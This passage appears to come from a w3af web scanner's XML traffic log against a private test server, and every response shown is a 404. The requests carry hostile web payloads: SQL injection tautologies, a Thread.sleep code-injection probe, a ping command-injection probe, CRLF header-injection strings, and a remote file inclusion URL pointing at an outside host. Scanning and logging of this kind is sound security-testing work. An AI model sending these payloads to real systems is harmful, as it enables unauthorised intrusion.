                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="457">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="457">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="459">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.bak HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="459">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.bak&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="461">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.back HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="461">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.back&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="462">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.class HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="462">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.class&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="463">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.java HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="463">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.java&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="464">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="464">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="467">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.old1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="467">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.old1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="469">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.backup HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="469">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.backup&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="470">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.old HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="470">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.old&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="471">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.backup1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="471">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.backup1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="472">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake.$$$ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="472">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.$$$&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="474">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/34%27+OR+%2734%27%3D%2734 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="474">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 34%27+OR+%2734%27%3D%2734 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='34%27+OR+%2734%27%3D%2734'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="491">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/34%27+AND+%2734%27%3D%2735 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="491">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 34%27+AND+%2734%27%3D%2735 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='34%27+AND+%2734%27%3D%2735'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="505">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/96+OR+96%3D96+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="505">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 96+OR+96%3D96+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='96+OR+96%3D96+'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="513">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/Thread.sleep%283000%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="513">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="558" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/Thread.sleep%283000%29%3B&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="515">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="515">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %2Fusr%2Fsbin%2Fping+-s+localhost+4 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%2Fusr%2Fsbin%2Fping+-s+localhost+4'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="518">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/96+AND+96%3D97+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="518">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 96+AND+96%3D97+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='96+AND+96%3D97+'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="527">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%22 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="527">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %22 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%22'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="531">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/iDontExist HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="531">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about iDontExist has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='iDontExist'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="533">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/w3af%0D%0Avulnerable073b%3A+ae5cw3af HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="533">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about w3af%0D%0Avulnerable073b%3A+ae5cw3af has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='w3af%0D%0Avulnerable073b%3A+ae5cw3af'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="535">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/w3af%0Dvulnerable073b%3A+ae5cw3af HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="535">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about w3af%0Dvulnerable073b%3A+ae5cw3af has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='w3af%0Dvulnerable073b%3A+ae5cw3af'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="538">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/http%3A%2F%2Fw3af.org%2Frfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="538">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="565" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A%2F%2Fw3af.org%2Frfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="540">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/w3af%0Avulnerable073b%3A+ae5cw3af HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="540">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
